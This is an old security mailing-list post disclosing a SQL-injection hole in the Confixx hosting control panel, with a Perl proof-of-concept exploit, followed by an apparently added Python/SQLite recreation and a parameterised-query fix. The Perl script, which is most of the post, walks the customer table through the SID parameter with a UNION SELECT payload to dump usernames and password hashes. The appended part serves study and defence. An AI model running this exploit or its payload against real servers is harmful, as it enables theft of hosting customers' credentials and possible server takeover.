Date: Tue Apr 18 23:01:11 2006
From: defa at systemli.org (defa)
Subject: Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln)

Here is more information on the confixx vuln released by LoK Crew.  
Sorry for the poor quality of this posting, I was short of time.

Product:
^^^^^^^
Confixx is a comprehensive control panel that provides the best  
value, proven quality, fully developed feature set and quality  
support. The software's powerful features have been especially  
designed to meet the requirements of hosting providers.
More -> http://www.swsoft.com/en/products/confixx/

Risk: High - eventually remote root access
^^^^

Severity: High
^^^^^^^^

Discussion:
^^^^^^^^^^^
The vuln itself can be found in html/session.inc.php, in the
function sessao_read( $sKey ), which is used to override PHP's own
session methods.
The file "loginform.php" can be used to display e.g. admin hashes.
Read the rest by studying the attached exploit.

Reference:
^^^^^^^^^^
Vuln was published by LoK-Crew here:
http://venom.sam-city.com/confixx2.txt

Read more:
^^^^^^^^^^^
http://www.securityfocus.com/bid/17476/


Code:
^^^^^

--------------- <snip> -------------

#!/usr/bin/perl
# PoC as posted: walks the "kunden" table one row per request through the
# injectable SID parameter of /user/index.php.
use IO::Socket;

if (@ARGV < 1)
{
	print q(
exploit by defa (2006)
=========================
confixx_exploit.pl [URL]
params:
   [URL] - server url
);
	exit;
}

$serv = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;   # strip a leading "http://" if one was given

# rows 0..100 of kunden, one per request (LIMIT $i,1)
for ($i = 0; $i <= 100; $i++)
{
	#$i=1;
	$hit = 0;
	# the UNION SELECT builds a serialised session value
	# ("_error|s:<len>:\"HIT: <kunde> : <longpw>\";") that the page echoes back;
	# the +8 accounts for the "HIT: " and " : " framing around the two fields
	$url  = "http://";
	$url .= $serv;
	$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
	$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B8,':%22','HIT:%20',";
	$url .= "kunde,'%20:%20',longpw,'%22;')%20AS%20'sdata'%20FROM%20kunden%20LIMIT%20";
	$url .= "$i,1/*";

	# note: as posted, the socket is opened to localhost while the Host header names $serv
	$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "localhost", PeerPort => "80" )
		|| die "[-] CONNECT FAILED\r\n";

	print $socket "GET $url HTTP/1.1\n";
	print $socket "Host: $serv\n";
	print $socket 'User-Agent: confixx_exploit'."\n";
	print $socket "Connection: close\n\n";

	# a row came back if the response carries the "HIT:" marker in a paragraph
	while ($answer = <$socket>)
	{
		if ($answer =~ /<p>HIT:/)
		{
			# $answer =~ s/<[A-Z,a-z,=].+>//g;
			print "$answer";
			$hit = 1;
		}
	}
	if ($hit == 0) { die("that's it"); }
}

--------------- <snap> -------------

bye
defa

--
don't eat yellow snow
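The vulnerable pattern described in the Discussion section beside its parameterised fix, added here as an example; it is not code from the post or from Confixx. It models a session-read handler in Python with SQLite: the table and column names (sessions/sdata, kunden/kunde/longpw) and the LIMIT i,1 row walk come from the post, the rows are constructed, and since the real session.inc.php and sessao_read() are not shown on the page, the exact shape of the vulnerable query is an assumption. The payload is the post's, rewritten for SQLite (`||` instead of CONCAT, no serialised-session framing).

```python
import sqlite3

# Constructed data: one session row and two kunden rows (hashes are placeholders).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sessions (sid TEXT PRIMARY KEY, sdata TEXT);
        CREATE TABLE kunden   (kunde TEXT, longpw TEXT);
        INSERT INTO sessions VALUES ('abc123', 'user|s:4:"web1";');
        INSERT INTO kunden   VALUES ('web1',  'constructed-hash-1');
        INSERT INTO kunden   VALUES ('admin', 'constructed-hash-2');
    """)
    return db

def session_read_vulnerable(db, skey):
    """Assumed shape of the flaw: the key is interpolated into the SQL text,
    so a quote inside it ends the literal and the rest is parsed as SQL."""
    row = db.execute(f"SELECT sdata FROM sessions WHERE sid='{skey}'").fetchone()
    return row[0] if row else ""

def session_read_hardened(db, skey):
    """Fix: the key is bound as a parameter and is never parsed as SQL."""
    row = db.execute("SELECT sdata FROM sessions WHERE sid=?", (skey,)).fetchone()
    return row[0] if row else ""

def injected_key(i):
    """The post's SID payload, adapted to SQLite; the trailing /* comments out
    the closing quote that the vulnerable query appends."""
    return ("1' AND 0=1 UNION SELECT 'HIT: '||kunde||' : '||longpw "
            f"FROM kunden LIMIT {i},1/*")

def dump_via_injection(read, max_rows=100):
    """Mirror the exploit's loop: request row i until nothing comes back."""
    hits = []
    for i in range(max_rows):
        data = read(injected_key(i))
        if not data.startswith("HIT: "):
            break
        hits.append(data)
    return hits

if __name__ == "__main__":
    db = build_db()
    # the vulnerable reader leaks every kunden row; the hardened one returns nothing,
    # because the whole payload is compared as a literal session id
    print("vulnerable:", dump_via_injection(lambda k: session_read_vulnerable(db, k)))
    print("hardened:  ", dump_via_injection(lambda k: session_read_hardened(db, k)))
```

The UNION works only because the session query returns a single column, which is why the post's payload aliases its result `AS 'sdata'`; binding the key (or, in PHP, using prepared statements rather than string-building inside the custom session handler) closes the hole regardless of how the SID is encoded.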
